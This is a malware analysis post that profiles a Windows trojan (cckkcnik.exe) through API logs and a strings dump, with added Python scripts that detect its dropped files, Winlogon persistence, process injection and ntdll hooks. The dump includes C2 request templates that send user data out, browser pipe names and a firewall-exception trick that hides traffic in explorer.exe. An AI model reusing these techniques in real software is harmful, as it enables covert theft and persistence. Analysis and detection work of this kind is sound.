HAXSPY Profiling

Published by Kareldjag




The scan on VirusTotal: [screenshot]

Creation of objects (service/driver, DLL and registry entry): [screenshot]

Process memory injection in explorer.exe: [screenshot]

Hooks in ntdll: [screenshot]

Network connections: [screenshot]

Some other actions:

- the loaded driver and service: [screenshot]

A summary of the actions: [screenshot]

The complete report:

Processes:
PID    ParentPID    User    Path   
--------------------------------------------------
3412    2312    POSTE2: Kareldjag   

Ports:
Port    PID    Type    Path   
--------------------------------------------------

Explorer Dlls:
DLL Path    Company Name    File Description   
--------------------------------------------------
No changes Found           

IE Dlls:
DLL Path    Company Name    File Description   
--------------------------------------------------
No changes Found           

Loaded Drivers:
Driver File    Company Name    Description   
--------------------------------------------------
C:\WINDOWS\system32\mmxtcpip.sys           

Monitored RegKeys
Registry Key    Value   
--------------------------------------------------
Hklm\SYSTEM\CurrentControlSet\Services    mmxtcpip   

Kernel31 Api Log
   
--------------------------------------------------
***** Installing Hooks *****   
719f70df     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)   
719f7cc4     RegOpenKeyExA (Protocol_Catalog9)   
719f737e     RegOpenKeyExA (0000001A)   
719f724d     RegOpenKeyExA (Catalog_Entries)   
719f78ea     RegOpenKeyExA (000000000001)   
719f78ea     RegOpenKeyExA (000000000002)   
719f78ea     RegOpenKeyExA (000000000003)   
719f78ea     RegOpenKeyExA (000000000004)   
719f78ea     RegOpenKeyExA (000000000005)   
719f78ea     RegOpenKeyExA (000000000006)   
719f78ea     RegOpenKeyExA (000000000007)   
719f78ea     RegOpenKeyExA (000000000008)   
719f78ea     RegOpenKeyExA (000000000009)   
719f78ea     RegOpenKeyExA (000000000010)   
719f78ea     RegOpenKeyExA (000000000011)   
719f78ea     RegOpenKeyExA (000000000012)   
719f78ea     RegOpenKeyExA (000000000013)   
719f78ea     RegOpenKeyExA (000000000014)   
719f78ea     RegOpenKeyExA (000000000015)   
719f78ea     RegOpenKeyExA (000000000016)   
719f78ea     RegOpenKeyExA (000000000017)   
719f78ea     RegOpenKeyExA (000000000018)   
719f78ea     RegOpenKeyExA (000000000019)   
719f78ea     RegOpenKeyExA (000000000020)   
719f78ea     RegOpenKeyExA (000000000021)   
719f2623     WaitForSingleObject(798,0)   
719f83c6     RegOpenKeyExA (NameSpace_Catalog5)   
719f737e     RegOpenKeyExA (00000005)   
719f7f5b     RegOpenKeyExA (Catalog_Entries)   
719f80ef     RegOpenKeyExA (000000000001)   
719f80ef     RegOpenKeyExA (000000000002)   
719f80ef     RegOpenKeyExA (000000000003)   
719f80ef     RegOpenKeyExA (000000000004)   
719f2623     WaitForSingleObject(790,0)   
719e1afa     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters)   
719e1996     GlobalAlloc()   
7c80b511     ExitThread()   
4001c9     LoadLibraryA(USER32.dll)=77d10000   
4001c9     LoadLibraryA(KERNEL32.dll)=7c800000   
58b53164     GetVersionExA()   
58b531cb     GetCommandLineA()   
58b54bba     GetVersionExA()   
58b55760     GetCurrentProcessId()=3412   
58b559ba     GetVersionExA()   
7ca36f9f     GetVersionExA()   
4001c9     LoadLibraryA(SHELL32.dll)=7c9d0000   
4001c9     LoadLibraryA(ADVAPI32.dll)=77da0000   
40128e     CreateFileA(\\.\mmxtcpip)   
77dc97ae     LoadLibraryA(Secur32.dll)=77fc0000   
40151d     RegCreateKeyExA (HKLM\System\CurrentControlSet\Control,(null))   
401680     RegSetValueExA (ver.)   
40151d     RegCreateKeyExA (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk,(null))   
401680     RegSetValueExA (DllName)   
401680     RegSetValueExA (Startup)   
401680     RegSetValueExA (Impersonate)   
401680     RegSetValueExA (Asynchronous)   
401680     RegSetValueExA (MaxWait)   
40154b     GetCommandLineA()   
401595     CreateFileA(C:\Documents and Settings\Administrateur.POSTE2\Mes documents\lastmalwares2\lastmalwares2\lastmalwares\cckkcnik.exe)   
4015b4     _lread(278,263968,4)   
7c839431     ReadFile()   
4015cb     _lread(278,26396c,1d)   
4015de     _lread(278,263989,4)   
4015f1     _lread(278,26398d,4)   
4012d1     CreateFileA(tcpwrk.dll)   
40161d     _lwrite(h=278)   
7c838db2     WriteFile(h=278)   
401631     _lwrite(h=278)   
4012d1     CreateFileA(mmxtcpip.sys)   
40165e     _lwrite(h=278)   
77db5f5e     WaitForSingleObject(278,2bf20)   
77e7fb8e     RegOpenKeyExA (HKLM\Software\Microsoft\Rpc)   
7c81084d     CreateRemoteThread(h=ffffffff, start=1723fd)   
1727fe     CreateFileA(C:\WINDOWS\system32\tcpwrk.dll)   
17281e     _lread(760,2de990,4)   
17282f     _lread(760,2de990,19)   
1728aa     _lread(760,2e85d8,4)   
1728bb     _lread(760,2e85d8,0)   
1728e1     _lread(760,2f2220,4)   
1728f2     _lread(760,2f2220,0)   
17292e     CreateFileA(\\.\mmxtcpip)   
172950     RegOpenKeyExA (HKLM\System\CurrentControlSet\Control)   
4014a0     LoadLibraryA(tcpwrk.dll)=170000   
7c8647cc     GetCurrentProcessId()=3412   
40119f     OpenProcess(pid=1152)   
40121a     WriteProcessMemory(h=750,len=67)   
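
The API log above is the part of the report to read for the three behaviours in the screenshots: the two components written to disk (tcpwrk.dll and mmxtcpip.sys), the Winlogon Notify registration, and the write into another process. The script below is an added example (not code from the original post, nor from SysAnalyzer) that parses log lines in this format and reports those findings; SAMPLE_LOG is a constructed excerpt copied from the log above, and the finding labels ("dropped_file", "injection", ...) are the script's own.

```python
"""Triage a SysAnalyzer-style API log for drop / persist / inject behaviour.

Added example: this is not code from the original post or from SysAnalyzer.
SAMPLE_LOG is a constructed excerpt of the "Kernel31 Api Log" above; the
finding labels ("dropped_file", "injection", ...) are this script's own.
"""
import re

SAMPLE_LOG = r"""
***** Installing Hooks *****
40128e     CreateFileA(\\.\mmxtcpip)
40151d     RegCreateKeyExA (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk,(null))
401680     RegSetValueExA (DllName)
4012d1     CreateFileA(tcpwrk.dll)
7c838db2     WriteFile(h=278)
4012d1     CreateFileA(mmxtcpip.sys)
40165e     _lwrite(h=278)
7c81084d     CreateRemoteThread(h=ffffffff, start=1723fd)
1727fe     CreateFileA(C:\WINDOWS\system32\tcpwrk.dll)
17281e     _lread(760,2de990,4)
17292e     CreateFileA(\\.\mmxtcpip)
4014a0     LoadLibraryA(tcpwrk.dll)=170000
40119f     OpenProcess(pid=1152)
40121a     WriteProcessMemory(h=750,len=67)
"""

# <return address> <api>(<args>)[=<retval>]; the address is where the call returns to.
LINE_RE = re.compile(r"^\s*([0-9a-fA-F]+)\s+([A-Za-z_][A-Za-z0-9_]*)\s*\((.*)\)(?:=\S+)?\s*$")
PE_EXT = (".dll", ".sys", ".exe")
CURRENT_PROCESS = "h=ffffffff"   # (HANDLE)-1 is the current-process pseudo-handle


def parse_api_log(text):
    """Return [(return_addr, api, args)] for every call line; banner lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            calls.append((int(m.group(1), 16), m.group(2), m.group(3)))
    return calls


def triage(calls):
    findings = []
    current_file = None     # last non-device path opened with CreateFileA
    dropped = set()
    pending_pid = None      # pid from the most recent OpenProcess
    for _addr, api, args in calls:
        if api == "CreateFileA":
            if args.startswith("\\\\.\\"):          # \\.\name opens a device object: a driver is present
                findings.append({"type": "device_open", "detail": args})
                current_file = None
            else:
                current_file = args
        elif api in ("WriteFile", "_lwrite") and current_file:
            # A PE that is written right after being created is a dropped component;
            # a file that is only opened and read (the system32 copy) is not flagged.
            if current_file.lower().endswith(PE_EXT) and current_file not in dropped:
                dropped.add(current_file)
                findings.append({"type": "dropped_file", "detail": current_file})
        elif api == "RegCreateKeyExA" and "winlogon\\notify" in args.lower():
            # A Winlogon Notify package is loaded into winlogon.exe at every logon.
            findings.append({"type": "winlogon_notify", "detail": args.split(",")[0]})
        elif api == "OpenProcess":
            m = re.search(r"pid=(\d+)", args)
            pending_pid = int(m.group(1)) if m else None
        elif api == "WriteProcessMemory" and pending_pid is not None:
            findings.append({"type": "injection", "pid": pending_pid,
                             "detail": f"WriteProcessMemory into pid {pending_pid} ({args})"})
        elif api == "CreateRemoteThread":
            where = "own process" if CURRENT_PROCESS in args else "foreign process"
            findings.append({"type": "remote_thread", "detail": f"{where}: {args}"})
    return findings


def triage_log(text):
    return triage(parse_api_log(text))


if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG):
        print(f"{f['type']:16} {f['detail']}")
```

Two details in the log are worth the distinction the script makes. The handle ffffffff passed to CreateRemoteThread is the current-process pseudo-handle, so that call starts a thread in the sample itself, at 0x1723fd, inside the 0x170000 region that LoadLibraryA(tcpwrk.dll) later returns; that is why the following calls carry 17xxxx return addresses. The injection the screenshot attributes to explorer.exe is the OpenProcess(pid=1152) followed by WriteProcessMemory(h=750), which is the pair the script reports as "injection".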

DirwatchData
   
--------------------------------------------------
WatchDir Initilized OK   
Watching C:\DOCUME~1\ADMINI~1.POS\LOCALS~1\Temp   
Watching C:\WINDOWS   
Watching C:\Program Files   
Modifed: C:\WINDOWS\system32\config\IDT.LOG   
Created: C:\Program Files\System Safety Monitor\RenderedLogs\img\icons\7d332b7e07e8f07ceb0f1422be55338d.bmp   
Modifed: C:\Program Files\System Safety Monitor\RenderedLogs\img\icons\7d332b7e07e8f07ceb0f1422be55338d.bmp   
Modifed: C:\WINDOWS\system32\config\system.LOG   
Created: C:\WINDOWS\system32\tcpwrk.dll   
Modifed: C:\WINDOWS\system32\tcpwrk.dll   
Modifed: C:\WINDOWS\system32   
Created: C:\WINDOWS\system32\mmxtcpip.sys   
Modifed: C:\WINDOWS\system32\mmxtcpip.sys   
Modifed: C:\Program Files\System Safety Monitor\Log\2006_5_20.POSTE2@Administrateur.ssm.log   
Created: C:\Program Files\System Safety Monitor\RenderedLogs\img\icons\be2e8b5952ef3c12cfc5d6082633205e.bmp   
Created: C:\DOCUME~1\ADMINI~1.POS\LOCALS~1\Temp\~DFB9B9.tmp   
Modifed: C:\Program Files\System Safety Monitor\RenderedLogs\img\icons\be2e8b5952ef3c12cfc5d6082633205e.bmp   
Modifed: C:\DOCUME~1\ADMINI~1.POS\LOCALS~1\Temp\~DFB9B9.tmp   
Created: C:\DOCUME~1\ADMINI~1.POS\LOCALS~1\Temp\4185XXXX   
File: cckkcnik.exe
Size: 13045 Bytes
MD5: 7A961A17BF7F04D51C266634D0D10E5A


File Properties: CompanyName     
FileDescription 
FileVersion     
InternalName    
LegalCopyright  
OriginalFilename
ProductName     
ProductVersion  

Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 96Kb in 0,015 seconds
Urls
--------------------------------------------------


RegKeys
--------------------------------------------------
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk
Software\Microsoft\Windows\CurrentVersion

ExeRefs
--------------------------------------------------
File: cckkcnik_dmp.exe_
\0000000.exe
ntoskrnl.exe
mprexe.exe
explorer.exe

Raw Strings:
--------------------------------------------------
File: cckkcnik_dmp.exe_
MD5:  aa4081d537334914846b6ae5572ac906
Size: 98306

Ascii Strings:
---------------------------------------------------------------------------
FSG!
KERNEL32.dll
tcpwrk.dll
t7j@h
tRPj
6e|RHGRytuity54747ESrye9hj
568ue5se64467498ei784467rye9hj
PPTh
XXPj
%t @
%p @
%l @
%h @
%d @
%@ @
%  @
%$ @
%( @
%, @
%0 @
%4 @
%8 @
%< @
%x @
%D @
%H @
%L @
%P @
%T @
%X @
%\ @
%` @
\\.\mmxtcpip
mmxtcpip
LAN TCPX2 service
wsprintfA
USER32.dll
CloseHandle
CreateFileA
CreateRemoteThread
CreateToolhelp32Snapshot
ExitProcess
GetCommandLineA
GetFullPathNameA
GetProcAddress
GetProcessHeap
GetSystemDirectoryA
HeapAlloc
LoadLibraryA
OpenProcess
Process32First
Process32Next
SetCurrentDirectoryA
VirtualAllocEx
WriteProcessMemory
_llseek
_lread
_lwrite
lstrcmpiA
lstrlenA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
CreateServiceA
GetUserNameA
OpenSCManagerA
RegCloseKey
RegCreateKeyExA
RegSetValueExA
StartServiceA
ADVAPI32.dll
!This program cannot be run in DOS mode.
.text
.rdata
@.data
.rsrc
@.reloc
ppaatthh.tmp
tcpwrk.dll
Wj!3
9winit
9WINIt
9Wini
9www.u
PheA
=6666u
9X`h@
Qh_u
QVWSR
Z[_^Y
?<FORt
?<for
?metht
?METH
?postt
?POST
?actit
?ACTIuR
?<TD t
?<td
?/td>t
?/TD>u
?<selu
?<SELu*f
ECu"
?selet
?SELEt
?</FOu
?</fou
?&nbsu
?<td>t
?<TD>u
?</FOu
?</fou
NO@Y
?/FORt
?/foru
?gzipu
text
[--
 --]
6666
WVSh
VWSj
@[_^
\0000000.exe
R%^Y&HFTYIDFSd2stg40yer57
4185
j#htP
j#htP
j#htP
SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
:*:Enabled:explorer
CMNDt
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk
System\CurrentControlSet\Control\MPRServices\TestService
!hNd
~4Ph,
XPh,
6666
/vX6
h6666h
<body bgcolor="#002140" text="#b1dbdd"><font size="3" color="#FF2222">proxy v 1.5 engine </font><font size="5"><br> Error 404</font>
HTTP/1.0 200 OK
6666
f=//t
>wwu
>WWu
</tB<:t
h6666h
t!@t
u$hx
Editt
PhHP
Ph&P
Ph6P
Kernel32
wininet.dll
LoadLibraryA
HttpSendRequestA
CreateThread
\\.\mmxtcpip
mmxtcpip
wsprintfA
CharLowerA
EnumChildWindows
GetClassNameA
GetForegroundWindow
GetWindowTextA
USER32.dll
CloseHandle
ConnectNamedPipe
CreateDirectoryA
CreateFileA
CreateFileMappingA
CreateNamedPipeA
CreateProcessA
CreateThread
DeleteFileA
DeviceIoControl
ExitThread
GetCurrentProcessId
GetCurrentThreadId
GetFileSize
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetSystemDirectoryA
GetTempPathA
GetTickCount
HeapAlloc
HeapFree
IsBadCodePtr
LoadLibraryA
MapViewOfFile
OpenProcess
RtlZeroMemory
Sleep
UnmapViewOfFile
VirtualAlloc
VirtualProtectEx
_llseek
_lread
_lwrite
lstrcatA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
KERNEL32.dll
CloseServiceHandle
DeleteService
OpenSCManagerA
OpenServiceA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ADVAPI32.dll
HttpOpenRequestA
ernetConnectA
InternetGetConnectedState
InternetOpenA
InternetQueryDataAvailable
InternetReadFile
WININET.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
KERNEL32.dll
tcpwrk.dll
tcpwrk
open
\tcpwrk.dll
NtDll.dll
LdrLoadDll
NtCreateProcess
NtCreateProcessEx
NtProtectVirtualMemory
NtWriteVirtualMemory
Z<-S10$21ZcwQ@8Ics0Xvf!3#6^0+DszV7x&
System\CurrentControlSet\Control
ver.
\mxstick.bin
POST /%s?os=nt HTTP/1.1
User-Agent: MSIE 5.0 (xp-sp2-0591)
Host: %s
Content-Length: %u
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
user=%s&info=
\%u.tmp
XXXXXXXX
\\.\pipe\IES4
\\.\pipe\IES4iexplore
\\.\pipe\IES4miranda
\\.\pipe\IES4mozilla
\\.\pipe\IES4thebat
\\.\pipe\IES4msimn
\\.\pipe\IES4msn
\\.\pipe\IES4icq
\\.\pipe\IES4opera
GET /%s?param=cmd&socks=%u&https=%u HTTP/1.0
User-Agent: Windows Updater
Host: %s
Connection: Keep-Alive
&020>0J0V0\0h0t0N4`4m4t4
5#545B5K5\5m5
6$6+6_6f6q6|6
7M7g7v7
8+808@8E8U8Z8j8o8
9'959=9J9\9
9$:3:C:H:M:r:
;(;0;6;K;V;k;w;
< <?<
0"02070D0I0T0n0x0
14191I1N1[1`1w1
2$252C2Q2\2n2z2
2+3>3I3Y3d3y3
444b4
5'5K5o5
6h6v6
7!7.787E7O7\7f7s7}7
8=8N8\8c8v8{8
8%9/969B9R9[9`9e9l9r9}9L:f:k:
;$;3;9;D;W;l;v;
;O<b<v<
="=.===B=^=r=
>">4>f>o>
1$202@3D3J3O3\3
7-7?7K7P7Z7e7n7t7
878A8G8M8S8Y8
9!949G9Z9e9r9
:$:4:J:Q:W:t:z:
;";(;.;4;:;@;F;L;R;X;^;d;j;p;v;|;
<$<*<0<6<
.text
h.rdata
H.data
INIT
.reloc
t$$hN
t$(h
XXXU
SVWhp
u&h,
WININET.DLL
Rj@j
Rj@j
Rj@j
Rj@j
Rj@j
Rj@j
9www.u
tcpwrk.dll
IoCreateDevice
IoCreateSymbolicLink
IofCompleteRequest
KeServiceDescriptorTable
ZwAllocateVirtualMemory
ntoskrnl.exe
D2J2g2
3#3)393@3F3X3`3i3r3}3
4'40464B4H4M4S4_4
5&5.565>5F5N5V5
506d6
7$7-7N7\7n7t7}7
8,878?8M8X8`8n8y8
9%939>9M9X9c9o9
:,:2:9:I:O:i:p:{:
;$;S;i;v;
EntryPoint
tcpwrk
StackSize
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk
Software\Microsoft\Windows\CurrentVersion
System\CurrentControlSet\Control\MPRServices\TestService
System\CurrentControlSet\Control
DllName
Startup
Impersonate
Asynchronous
CommonFilesDir
MaxWait
mmxtcpip.sys
mprexe.exe
open
[%u%u[%s]
ver.
explorer.exe
C:\WINDOWS\system32
C:\WINDOWS\system32\mmxtcpip.sys
[31403998161570199908[Administrateur]
Administrateur
tcpwrk.dql
S%&"
<tRPP0
6e|RHG
yt9ui
ES~r
e9hHtQ
568ueWs>
CDsj
2-AR
)t^=
!P!Th
J'"MqX
;E(%F7h
\V<0H
fH4Q
pQA+x
vbXj
Cp!l
(d,20
C<!x
HdL2P
C\!`
LAN TCPXv2
servic
wspr
intfA
USER%32
wCHo
|R1mo
To'lh
:hN4m'$
mDgiJc
Open9
cpoV
HWHA
uoj>
Vv&S
8QU5
y4g,T
This
proggam
DO~S
mode.
$LDP@EL8
.rdat
j.'N
SPL+<(
rspc
@PV%re
MWj!3
9winFt
t<P~
*<VE86
M*S!
hY@A
8]"p
!7hPB";
@Nt=
yQ=@0
J#.A
9X`h@
Szik
e@tRey
 v[^_
UDafA
u3[S
h&0u
?<FORt
for@
&meBj
METH
:> t
u3GK
post
PO STDz
actiH
ACTIuR
8,">
<TD
3cM*l
!e/2>'
B!RM
L%1o
w5P3
t-o?
\%VWNH
gzipB
5fA^
t? ,
&<#C
[-+ Y.2
]HYh
$"%%
EstF
'$VB
 dD!
R%^Y&H:FT
ID@Sd2stg
40yer57
1v8$
D]+!
r]SQD
R"#-
j|EwB.
\Contr
=ha|=dA
Fi.w
PyNt
\Auth
Lzwp
:*'E
ab=NdX
S1yR
yO%g
CMND
;p"o
DR#^
FTWARE\M
D=d=w
 NTv
h,, Q:Q
DY&A
!ih(
ae%h
~4P(
"c/=
L&BL
Th(?j;
>"WT
/Gd{
uTqKb
fWfY
N/"&
$cmw
42H)
Y6-z&u:
0u$@
$5ND
<body
="#0#214
nt' s
>Pggx
v!1.5
en[g
x0 2
n1<w5
f=q/wt
'>qw%u
qPHW
_WUS
u'N^
mdX>[
iX"$
 7Edi\t+K
B<!}
rdD"g
-d,L!l:
e;8l
X%{nG
0d428
CL!P
Xd\2`
xd|2
$d(2,
C8"<
FUst
k^XP
@$RHd
z2TA
=RHD
Kern1l32
))L<f
AdB"H2G\
Enum
$ildS
')G]
uSn(pQ[
cZVZ
}Iokg
B*n+
 WKS
odulk
&pu,H
ewOf
Unm<8
2adV|
N?IB
CC }
vR)Bf
nDHGAvY
S2_)
VT,Y
/bHJ
fX!\
|NiD
;_K.
S10$2O cwQ@8vI}s
Xvf!3#6^
zV7x&
/%s?
v-0Ag
SIEV5
xp-sn2
91)HH
j=hz
u1W-L
gYh)u
D$a+
/x-w
E^KPu
fX)01
3.S81O+Wb
SEM3U
a*-s
Te4f
N4X`
v$x+z_|f~q~|~
G'g5
v(x0z6|K~V~k~w~
0"$>7
914:9;I<N=[>`?w?
v!x.z8|E~O~\~f~s~}~
%9/'6GBgR
;$<3=9>D?W?l?v?
O<b^:;
v"x4zf|o~
C@3D
9r!t4vGIZ
;4<J=Q>W?t?z?
~.~4~:~@~F~L~R~X~^~d~jIpN?|?
><iIu
+HdH
b5t#
hB\P
?/"#
9_8:
'  D
fCgM
ff$hp
UXY4-
vXd\X
('bK
5Z@e
S!~a
W'V-
Symb
%ZwQ`?
%1nJsk
$6OB
06d'
[~X~`~n~yO
:,;2
xSNi
syPoki
i^,K
wWMm
RDR6A
Z?98_
MaxW
.mXHx
LoadLibraryA
GetProcAddress

Unicode Strings:
---------------------------------------------------------------------------
jjjjj
@jjjj
jjjjjj
SHOW
Security warning
MS Sans Serif
check
\Device\mmxtcpip
\DosDevices\mmxtcpip
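
The strings dump above mixes packer noise with the indicators that matter: the device and pipe names, the registry paths, the two HTTP request templates with their User-Agent values, and the Windows Firewall exception written for explorer. The following script is an added example (not code from the original post) that buckets such a dump into indicator categories and decodes the firewall entry. STRINGS is a constructed excerpt of the Ascii/Unicode strings above; the category names and the SYSTEM_HOSTS list are the script's own, and the explorer.exe path given to decode_firewall_value() is an assumption, since the dump shows only the ':*:Enabled:explorer' suffix and the key it is written under.

```python
"""Pull indicators out of a raw strings dump such as the one above.

Added example, not code from the original post. STRINGS is a constructed
excerpt of the strings listed above; the category names and the
SYSTEM_HOSTS judgement list are this script's own. The explorer.exe path
used below is an assumption: the dump shows only the ':*:Enabled:explorer'
suffix and the key it is written under.
"""
import re

STRINGS = r"""
\\.\mmxtcpip
LAN TCPX2 service
SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
:*:Enabled:explorer
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk
System\CurrentControlSet\Control\MPRServices\TestService
NtDll.dll
LdrLoadDll
NtCreateProcess
NtCreateProcessEx
NtProtectVirtualMemory
NtWriteVirtualMemory
POST /%s?os=nt HTTP/1.1
User-Agent: MSIE 5.0 (xp-sp2-0591)
Host: %s
user=%s&info=
\\.\pipe\IES4iexplore
\\.\pipe\IES4mozilla
GET /%s?param=cmd&socks=%u&https=%u HTTP/1.0
User-Agent: Windows Updater
\Device\mmxtcpip
\DosDevices\mmxtcpip
""".strip().splitlines()

REG_ROOTS = ("hklm\\", "hkcu\\", "software\\", "system\\")
NATIVE_API = re.compile(r"^(?:Nt|Zw|Ldr|Rtl)[A-Z][A-Za-z0-9]+$")


def classify(strings):
    """Bucket strings into indicator categories; anything else is ignored."""
    iocs = {"registry": [], "pipes": [], "devices": [], "requests": [],
            "user_agents": [], "native_api": []}
    for s in strings:
        low = s.lower()
        if low.startswith("\\\\.\\pipe\\"):
            iocs["pipes"].append(s)
        elif low.startswith(("\\\\.\\", "\\device\\", "\\dosdevices\\")):
            iocs["devices"].append(s)
        elif low.startswith(REG_ROOTS):
            iocs["registry"].append(s)
        elif re.match(r"^(?:GET|POST) /", s):
            iocs["requests"].append(s)
        elif s.startswith("User-Agent:"):
            iocs["user_agents"].append(s.split(":", 1)[1].strip())
        elif NATIVE_API.match(s):
            iocs["native_api"].append(s)
    return iocs


def firewall_list_keys(strings):
    """Registry paths under the XP SP2 firewall AuthorizedApplications list."""
    return [s for s in strings
            if "firewallpolicy" in s.lower() and "authorizedapplications" in s.lower()]


def decode_firewall_value(exe_path, suffix):
    """An AuthorizedApplications entry is a REG_SZ named by the exe path whose data is
    '<path>:<scope>:<Enabled|Disabled>:<display name>'; scope '*' means any address."""
    path, scope, state, name = (exe_path + suffix).rsplit(":", 3)
    return {"path": path, "scope": scope, "state": state, "name": name}


# Binaries that have no business in the exception list (assumed list): an enabled
# entry for one of them usually means injected code wants to talk out under that name.
SYSTEM_HOSTS = {"explorer.exe", "svchost.exe", "winlogon.exe", "lsass.exe", "services.exe"}


def suspicious_exception(entry):
    exe = entry["path"].rsplit("\\", 1)[-1].lower()
    return exe in SYSTEM_HOSTS and entry["state"].lower() == "enabled"


if __name__ == "__main__":
    for category, items in classify(STRINGS).items():
        print(category, items)
    entry = decode_firewall_value(r"C:\WINDOWS\explorer.exe", ":*:Enabled:explorer")
    print(entry, suspicious_exception(entry))
```

The two User-Agent values are the cheapest network indicators here: "Windows Updater" and "MSIE 5.0 (xp-sp2-0591)" are not strings any legitimate client on the box sends, so they are worth a proxy-log search on their own. On the firewall side, the check to run on a suspect XP SP2 machine is the same as suspicious_exception(): list the values under AuthorizedApplications\List and treat an Enabled entry for explorer.exe or another system binary as an indicator, since the shell has no reason to accept inbound connections.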

NB: in the screenshots two groups of strings were marked in red. The first is the key SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ together with the value suffix ':*:Enabled:explorer': registering explorer.exe in the Windows Firewall authorized-applications list is the method used to avoid firewall alerts, since the network code runs inside explorer.exe after the injection. The second is the group NtDll.dll, LdrLoadDll, NtCreateProcess, NtCreateProcessEx, NtProtectVirtualMemory, NtWriteVirtualMemory: the ntdll exports the sample resolves in order to place the hooks shown above.
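
A hook on those ntdll exports is an inline patch of the first bytes of each function in the process where the DLL was injected, and the way to confirm it is to look at those bytes. The script below is an added example (not code from the original post) of that check on 32-bit prologues: it recognises the Windows XP SP2 system-call stub as clean, follows a jmp rel32 or push/ret patch to its target and names the module it lands in. Everything in it is constructed: the ntdll range and the size of tcpwrk.dll are assumptions (its base, 0x170000, is the LoadLibraryA(tcpwrk.dll) return value in the API log), the export addresses are made up, and the hooked NtWriteVirtualMemory stub is built by the script itself.

```python
"""Heuristic inline-hook check for 32-bit ntdll export prologues.

Added example, not from the original post. Every byte string and address
here is constructed: clean stubs follow the Windows XP SP2 x86 Nt* pattern
    mov eax, <syscall#> ; mov edx, 7FFE0300h ; call [edx] ; ret <n>
and the hooked one has its first five bytes replaced by a jmp rel32, which
is how an inline hook leaves the export. The ntdll range is assumed;
0x170000 is the LoadLibraryA(tcpwrk.dll) return value in the API log above
(the size of that module is assumed).
"""
import struct

MODULES = {"ntdll.dll": (0x7C900000, 0x7C9B0000), "tcpwrk.dll": (0x170000, 0x180000)}


def module_for(addr):
    for name, (lo, hi) in MODULES.items():
        if lo <= addr < hi:
            return name
    return None


def xp_stub(syscall_no, stack_bytes):
    """B8 imm32 / BA 00 03 FE 7F / FF 12 / C2 imm16: the XP SP2 system-call stub."""
    return (b"\xB8" + struct.pack("<I", syscall_no)
            + b"\xBA\x00\x03\xFE\x7F\xFF\x12\xC2" + struct.pack("<H", stack_bytes))


def jmp_hook(addr, target, original):
    """Overwrite the first 5 bytes at addr with E9 rel32 to target, as a hook would."""
    return b"\xE9" + struct.pack("<i", target - (addr + 5)) + original[5:]


def classify_prologue(code, addr):
    """('clean', syscall#) | ('jmp', target) | ('push_ret', target) | ('unknown', None)."""
    if len(code) >= 10 and code[0] == 0xB8 and code[5:10] == b"\xBA\x00\x03\xFE\x7F":
        return "clean", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 5 and code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp", (addr + 5 + rel) & 0xFFFFFFFF
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        return "push_ret", struct.unpack_from("<I", code, 1)[0]
    return "unknown", None


def scan(exports):
    """exports: {name: (addr, first bytes)} -> [(name, verdict, detail)]."""
    report = []
    for name, (addr, code) in exports.items():
        kind, value = classify_prologue(code, addr)
        if kind == "clean":
            report.append((name, "clean", f"syscall 0x{value:X}"))
        elif kind in ("jmp", "push_ret"):
            mod = module_for(value) or "unmapped memory"
            verdict = "hooked" if mod != "ntdll.dll" else "patched within ntdll"
            report.append((name, verdict, f"{kind} to 0x{value:08X} in {mod}"))
        else:
            # Not every export is a syscall stub (LdrLoadDll is ordinary code); there the
            # only reliable check is a byte compare against the on-disk image of ntdll.
            report.append((name, "unverified", "not a syscall stub; diff against ntdll.dll on disk"))
    return report


# Constructed sample: the syscall numbers are the XP values for these services,
# the addresses are made up, and NtWriteVirtualMemory is redirected into tcpwrk.dll.
EXPORTS = {
    "NtCreateProcess":        (0x7C90D5E0, xp_stub(0x2F, 0x20)),
    "NtCreateProcessEx":      (0x7C90D5F0, xp_stub(0x30, 0x24)),
    "NtProtectVirtualMemory": (0x7C90D9E0, xp_stub(0x89, 0x14)),
    "NtWriteVirtualMemory":   (0x7C91D5F0, jmp_hook(0x7C91D5F0, 0x172400, xp_stub(0x115, 0x14))),
    "LdrLoadDll":             (0x7C9161CA, b"\x8B\xFF\x55\x8B\xEC\x83\xE4\xF8"),
}

if __name__ == "__main__":
    for name, verdict, detail in scan(EXPORTS):
        print(f"{name:24} {verdict:22} {detail}")
```

On a live machine the table would be filled by reading the first sixteen bytes of each export from the process that received the injection (explorer.exe here), and the target module of any redirected stub is the hooking component, which on this sample is tcpwrk.dll. Two caveats: the clean pattern is specific to the XP-era 32-bit stub, so it has to be adjusted for other Windows versions, and an "unknown" prologue is not evidence of a hook on its own; the on-disk compare is what settles those cases.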



Published in METHODOLOGY
